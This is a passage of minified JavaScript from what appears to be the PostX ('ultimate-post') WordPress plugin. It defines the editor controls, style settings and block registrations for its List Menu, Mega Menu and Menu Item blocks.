ultpMenuCss`},r&&n),(0,a.createElement)("div",{className:"ultp-list-menu-wrapper"},(0,a.createElement)("div",{className:"ultp-list-menu-content"},(0,a.createElement)(i.Content,null))))}},60276:(e,t,l)=>{"use strict";l.d(t,{K:()=>u,w:()=>c});var o=l(67294),a=l(53049),i=l(87763),n=l(92637);const{ToolbarGroup:r,ToolbarButton:s,Dropdown:p}=wp.components,{__}=wp.i18n,c=e=>{const{clientId:t,isSelected:l,store:n}=e;return(0,o.createElement)(o.Fragment,null,l&&(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Add Item",icon:i.Z.plus,onClick:()=>{wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{}),999,t,!1)}}),(0,o.createElement)(p,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Style",icon:i.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"toggle",key:"innerCurrItemStyle",label:__("User Hover as Active Color","ultimate-post")},{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:n})}),(0,o.createElement)(p,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(s,{label:"Spacing",icon:i.Z.spacing,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:20,data:{type:"range",key:"listItemGap",min:0,max:100,step:1,responsive:!0,unit:["px"],label:__("Item Gap","ultimate-post")}}],initialOpen:!0,store:n})})),(0,o.createElement)(r,null,(0,o.createElement)(s,{label:"Delete List Menu",icon:i.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(t,!0)}})))},u=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"global",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:10,data:{type:"alignment",block:"list-menu",key:"listMenuAlignItems",disableJustify:!0,icons:["left_new","center_new","right_new","alignStretch"],options:["flex-start","center","flex-end","stretch"],label:__("Items Alignment","ultimate-post")}},{position:20,data:{type:"range",key:"listItemGap",min:0,max:100,step:1,responsive:!0,unit:["px"],label:__("Item Gap","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("List Item","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Icon","ultimate-post"),include:[{position:5,data:{type:"toggle",key:"iconAfterText",label:__("Icon After Text","ultimate-post")}},{position:10,data:{type:"range",key:"iconSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"iconSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Spacing","ultimate-post")}},{position:30,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color",key:"iconColorHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Dropdown Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"dropIcon",selection:a.ov,label:__("Choose Icon","ultimate-post")}},{position:10,data:{type:"color",key:"dropColor",label:__("Icon Color","ultimate-post")}},{position:10,data:{type:"color",key:"dropColorHvr",label:__("Icon Hover Color","ultimate-post")}},{position:15,data:{type:"range",key:"dropSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"dropSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Text to Icon Spacing","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Wrapper","ultimate-post"),include:[{position:30,data:{type:"color2",key:"listMenuBg",image:!1,label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"listMenuBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"boxshadow",key:"listMenuShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"listMenuRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:70,data:{type:"dimension",key:"listMenuPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},31145:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(82279),n=l(38523);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/list-menu",{title:__("List Menu","ultimate-post"),parent:["ultimate-post/menu-item"],icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/list_menu.svg",alt:"List Menu"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Manage and Customize Menus in a List Format.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("list","ultimate-post")],supports:{html:!1,reusable:!1},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},listItemGap:{type:"object",default:{lg:"0",ulg:"px"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                        .postx-page {{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { gap: {{listItemGap}};}"}]},listMenuAlignItems:{type:"string",default:"stretch",style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                        .postx-page {{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { align-items: {{listMenuAlignItems}}; }"}]},listMenuBg:{type:"object",default:{openColor:1,type:"color",color:"#F5F5F5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#D2D2D2"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#037fff"},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content"}]},listMenuRadius:{type:"object",default:{lg:{top:4,right:4,bottom:4,left:4,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { border-radius:{{listMenuRadius}}; }"}]},listMenuPadding:{type:"object",default:{lg:{top:"12",bottom:"12",left:"8",right:"8",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-list-menu-wrapper > .ultp-list-menu-content { padding:{{listMenuPadding}}; }"}]},dropIcon:{type:"string",default:"rightAngle2"},dropColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColor}}; }'}]},dropColorHvr:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { color: {{dropColorHvr}}; }'}]},dropSize:{type:"object",default:{lg:"14",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-dropdown svg { height: {{dropSize}}; width: {{dropSize}}; }'}]},dropSpacing:{type:"object",default:{lg:"64",ulg:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { gap: {{dropSpacing}}; }'}]},itemTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text'}]},itemColor:{type:"string",default:"#2E2E2E",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }'}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},innerCurrItemStyle:{type:"toggle",default:!1},itemColorHvr:{type:"string",default:"#6E6E6E",style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }'}]},itemBgHvr:{type:"object",default:{openColor:1,type:"color",color:"#FFFFFF"},style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"innerCurrItemStyle",condition:"==",value:!1}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'},{depends:[{key:"innerCurrItemStyle",condition:"==",value:!0}],selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container,\n                    .ultpMenuCss .wp-block-ultimate-post-menu-item > .ultp-current-link.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container'}]},itemRadius:{type:"object",default:{top:4,right:4,bottom:4,left:4,unit:"px"},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }'}]},itemPadding:{type:"object",default:{lg:{top:12,right:12,bottom:12,left:20,unit:"px"}},style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container { padding:{{itemPadding}}; }'}]},iconAfterText:{type:"boolean",default:!1},iconSize:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:'\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg,\n                        .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon img { height: {{iconSize}}; width: {{iconSize}}; }'}]},iconSpacing:{type:"object",default:{lg:"10",ulg:"px"},style:[{selector:'.ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-label { gap: {{iconSpacing}}; }'}]},iconColor:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { fill:{{iconColor}} }'}]},iconColorHvr:{type:"string",default:"#000",style:[{selector:'.ultpMenuCss .wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper[data-parentbid="{{ULTP}}"] > .ultp-menu-item-label-container .ultp-menu-item-icon svg { fill:{{iconColorHvr}} }'}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-menu-wrapper {z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},72874:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(87462),a=l(67294),i=l(99838),n=l(87763),r=l(22278);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,BlockControls:c}=wp.blockEditor,{ToolbarGroup:u,ToolbarButton:d}=wp.components,{useState:m,useEffect:g,useRef:y,Fragment:b,useMemo:v}=wp.element,{dispatch:h}=wp.data,{getBlockAttributes:f,getBlockParents:k,getBlockCount:w}=wp.data.select("core/block-editor");function x(e){const t=y(null),[l,x]=m("Content"),{setAttributes:T,name:_,className:C,attributes:E,clientId:S,attributes:{blockId:P,advanceId:L,megaWidthType:I,megaParentBlock:B,megaAlign:U}}=e,M={setAttributes:T,name:_,attributes:E,setSection:x,section:l,clientId:S};g((()=>{const e=S.substr(0,6);P?P&&P!=e&&T({blockId:e}):T({blockId:e}),A("setTimeout"),setTimeout((()=>{A("setTimeout");const e=document.querySelector(".editor-styles-wrapper"),t=new ResizeObserver((e=>{A("resizeObserver")}));e&&t.observe(e)}),1e3),document.addEventListener("click",(function(e){A("click")}))}),[S]);const A=e=>{const t=document.querySelectorAll(".wp-block-ultimate-post-menu-item.hasMegaMenuChild > .ultp-menu-item-wrapper > .ultp-menu-item-content");t.length>0&&t.forEach((function(e){if(e?.classList.contains("ultpMegaWindowWidth")){const t=document.querySelector(".editor-styles-wrapper"),l=t?t.offsetWidth:800,o=t?t.getBoundingClientRect().left:0,a=e.getBoundingClientRect().left,i=e.querySelector(" .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");i&&(i.style.maxWidth=`${l}px`,i.style.boxSizing="border-box");const n=e.querySelector(" .block-editor-inner-blocks");n&&(n.style.left=`-${a-o}px`)}else if(e?.classList.contains("ultpMegaMenuWidth")){const t=e.closest(".wp-block-ultimate-post-menu"),l=t?t.offsetWidth:800,o=t?t.getBoundingClientRect().left:0,a=e.getBoundingClientRect().left,i=e.querySelector(" .block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");i&&(i.style.maxWidth=`${l}px`,i.style.boxSizing="border-box");const n=e.querySelector(".block-editor-inner-blocks");n&&(n.style.left=`-${a-o}px`)}else{const t=e?.querySelector(".block-editor-inner-blocks > .block-editor-block-list__layout > .wp-block > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper");t&&(t.style.maxWidth="",t.style.boxSizing="");const l=e?.querySelector(".block-editor-inner-blocks");l&&(l.style.left="")}}))};g((()=>{const e=t.current,l=k(S);e?t.megaWidthType!=I&&(h("core/block-editor").updateBlockAttributes(l[l.length-1],{megaWidthType:I}),t.current=E):t.current=E;const{parentBlock:o}=f(l[l.length-1])||{};B!=o&&T({megaParentBlock:o})}),[E]);const H=v((()=>(0,i.Kh)(E,"ultimate-post/mega-menu",P,!1)),[E,S]),N=w(S);return(0,a.createElement)(b,null,(0,a.createElement)(c,null,(0,a.createElement)(u,null,(0,a.createElement)(d,{label:"Delete Mega Menu",icon:n.Z.delete,onClick:()=>{wp.data.dispatch("core/block-editor").removeBlock(S,!0)}}))),(0,a.createElement)(s,null,(0,a.createElement)(r.g,{store:M})),(0,a.createElement)("div",(0,o.Z)({},L&&{id:L},{className:`ultp-block-${P} ${C} ultpMenuCss`}),H&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,a.createElement)("div",{className:"ultp-mega-menu-wrapper"},(0,a.createElement)("div",{className:`ultp-mega-menu-content _${U}`},(0,a.createElement)(p,{templateLock:!1,renderAppender:N?void 0:()=>(0,a.createElement)(p.ButtonBlockAppender,null)})))))}},30891:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,megaAlign:n}=e.attributes,r={},s=Object.keys(r);return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,className:`ultp-block-${t} ultpMenuCss`},s&&r),(0,a.createElement)("div",{className:"ultp-mega-menu-wrapper"},(0,a.createElement)("div",{className:`ultp-mega-menu-content _${n}`},(0,a.createElement)(i.Content,null))))}},22278:(e,t,l)=>{"use strict";l.d(t,{g:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"alignment",key:"megaAlign",block:"mega-menu",disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}},{position:10,data:{type:"select",key:"megaWidthType",label:__("Width Type","ultimate-post"),options:[{value:"windowWidth",label:__("Window Width","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")},{value:"parentMenuWidth",label:__("Parent Menu Width","ultimate-post")}]}},{position:20,data:{type:"range",key:"megaWidth",min:0,max:1800,step:1,responsive:!0,unit:["px"],label:__("Width","ultimate-post")}},{position:30,data:{type:"range",key:"megaContentWidth",min:0,max:1800,step:1,responsive:!0,unit:["px"],label:__("Content Max Width","ultimate-post")}},{position:40,data:{type:"color2",key:"megaBg",image:!0,label:__("Background","ultimate-post")}},{position:50,data:{type:"border",key:"megaBorder",label:__("Border","ultimate-post")}},{position:55,data:{type:"boxshadow",key:"megaShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"megaRadius",step:1,unit:!0,responsive:!0,label:__("Radius","ultimate-post")}},{position:70,data:{type:"dimension",key:"megaPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:2,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}}],initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},37216:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(72874),n=l(30891);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/menu/","block_docs"),r("ultimate-post/mega-menu",{title:__("Mega Menu","ultimate-post"),parent:["ultimate-post/menu-item"],icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section ultp-megamenu-pro-icon"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/menu/mega_menu.svg",alt:"Mega Menu"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Build Advanced and Engaging Multi-Level Menu.","ultimate-post")),keywords:[__("menu","ultimate-post"),__("mega","ultimate-post"),__("mega menu","ultimate-post")],supports:{html:!1,reusable:!1,align:[]},example:{attributes:{previewImg:!1}},edit:i.Z,save:n.Z,attributes:{blockId:{type:"string",default:""},previewImg:{type:"string",default:""},megaParentBlock:{type:"string",default:""},megaAlign:{type:"string",default:"center"},megaWidthType:{type:"string",default:"custom",style:[{depends:[{key:"megaParentBlock",condition:"==",value:"hasMenuParent"}]},{depends:[{key:"megaWidthType",condition:"==",value:"windowWidth"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: 100vw; }"},{depends:[{key:"megaWidthType",condition:"==",value:"parentMenuWidth"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: 100vw; }"}]},megaWidth:{type:"object",default:{lg:"400",ulg:"px"},style:[{depends:[{key:"megaWidthType",condition:"==",value:"custom"}],selector:"{{ULTP}} > .ultp-mega-menu-wrapper { width: {{megaWidth}}; }"}]},megaContentWidth:{type:"object",default:{lg:"400",ulg:"px"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper > .ultp-mega-menu-content { max-width: {{megaContentWidth}}; }"}]},megaBg:{type:"object",default:{openColor:1,type:"color",color:"#F5F5F5",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#D2D2D2"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper"}]},megaPadding:{type:"object",default:{lg:{top:16,bottom:16,left:16,right:16,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { padding:{{megaPadding}}; }"}]},megaRadius:{type:"object",default:{lg:{top:4,bottom:4,left:4,right:4,unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { border-radius:{{megaRadius}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-mega-menu-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},94965:(e,t,l)=>{"use strict";l.d(t,{Z:()=>C});var o=l(87462),a=l(67294),i=l(99838),n=l(87763),r=l(64766),s=l(35051);const{__}=wp.i18n,{InspectorControls:p,InnerBlocks:c,RichText:u,BlockControls:d}=wp.blockEditor,{Fragment:m,useState:g,useEffect:y,useMemo:b}=wp.element,{Dropdown:v,Toolbar:h,ToolbarButton:f}=wp.components,{getBlockAttributes:k,getBlockParents:w,getBlockCount:x,getBlocks:T,getBlockName:_}=wp.data.select("core/block-editor");function C(e){const[t,l]=g("Content"),{setAttributes:h,name:f,className:C,attributes:E,clientId:S,attributes:{previewImg:P,blockId:L,advanceId:I,menuItemText:B,hasChildBlock:U,childBlock:M,parentBlock:A,childMegaWidth:H,parentDropIcon:N,iconAfterText:j,enableBadge:Z,badgeText:O,parentBid:R,menuIconType:D,menuItemIcon:z,menuItemImg:F,menuItemSvg:W,parentMenuInline:V}}=e,G={setAttributes:h,name:f,attributes:E,setSection:l,section:t,clientId:S};y((()=>{const e=S.substr(0,6);L?L&&L!=e&&h({blockId:e}):h({blockId:e})}),[S]),y((()=>{const e=w(S),t=e[e.length-1],l=T(S),o=l[0]?.name||"",{megaWidthType:a}=l[0]?l[0].attributes:{},i=t?_(t):"",{menuInline:n,dropIcon:r,iconAfterText:s,blockId:p}=k(e[e.length-1])||{},c="ultimate-post/menu"==i?"hasMenuParent":"ultimate-post/list-menu"==i?"hasListMenuParent":"",u="ultimate-post/mega-menu"==o?"hasMegaMenuChild":"ultimate-post/list-menu"==o?"hasListMenuChild":"",d="windowWidth"==a?"ultpMegaWindowWidth":"parentMenuWidth"==a?"ultpMegaMenuWidth":"ultpMegaCustomWidth",m=l.length>0,g=null!=n&&n,y=s,b=`.ultp-block-${p||"null"}`,v={...A!=c&&{parentBlock:c},...M!=u&&{childBlock:u},...H!=d&&{childMegaWidth:d},...U!=m&&{hasChildBlock:m},...V!=g&&{parentMenuInline:g},...N!=r&&{parentDropIcon:r},...E.iconAfterText!=y&&{iconAfterText:y},...R!=b&&{parentBid:b}};Object.keys(v).length>0&&h(v)}),[E]);const q=b((()=>(0,i.Kh)(E,"ultimate-post/menu-item",L,!1)),[E,S]);if(P)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:P});const $=x(S)>0;let K;return $!=U&&h({hasChildBlock:$}),"img"==D?K=(0,a.createElement)("img",{src:F?.url||"#",alt:"Menu Item Image"}):"icon"==D?K=r.ZP[z]:"svg"==D&&(K=W),(0,a.createElement)(m,null,(0,a.createElement)(d,null,(0,a.createElement)(s.m,{isSelected:e.isSelected,clientId:S,store:G,__hasChildBlock:$})),(0,a.createElement)(p,null,(0,a.createElement)(s.T,{clientId:S,store:G})),(0,a.createElement)("div",(0,o.Z)({},I&&{id:I},{className:`ultp-block-${L} ${C} ${A} ${M} ultpMenuCss`}),q&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,a.createElement)("div",{"data-parentbid":R,className:"ultp-menu-item-wrapper"},(0,a.createElement)("div",{className:"ultp-menu-item-label-container"},(0,a.createElement)("a",{style:{pointerEvents:"none"},className:"ultp-menu-item-label ultp-menuitem-pos-"+(j?"aft":"bef")},e.isSelected||""==B?(0,a.createElement)(u,{key:"editable",isSelected:!1,tagName:"div",className:"ultp-menu-item-label-text",placeholder:__("Item 